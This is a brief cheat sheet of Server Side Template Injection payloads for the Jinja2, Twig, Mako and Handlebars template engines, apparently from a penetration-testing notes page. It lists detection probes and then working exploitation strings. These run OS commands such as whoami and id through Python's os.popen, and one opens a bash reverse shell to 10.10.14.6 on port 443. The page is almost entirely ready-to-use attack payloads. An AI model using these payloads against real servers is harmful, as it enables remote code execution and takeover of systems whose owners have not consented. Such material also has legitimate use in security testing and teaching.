SSTI
Server Side Template Injection
Jinja2, Twig, and Mako Engines.
${config}${7*7}${self}Using OS module
${self.module.cache.util.os.popen('whoami').read()}Python (Jinja2, Django) // PHP (Liquid) // Handlebars Engines
Testing
{{7*7}}{{config}}{{self}}Exploitation
Python global scope
{{ namespace.__init__.__globals__.os.popen('id').read() }}Reverse Shell
{{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"').read() }}Last updated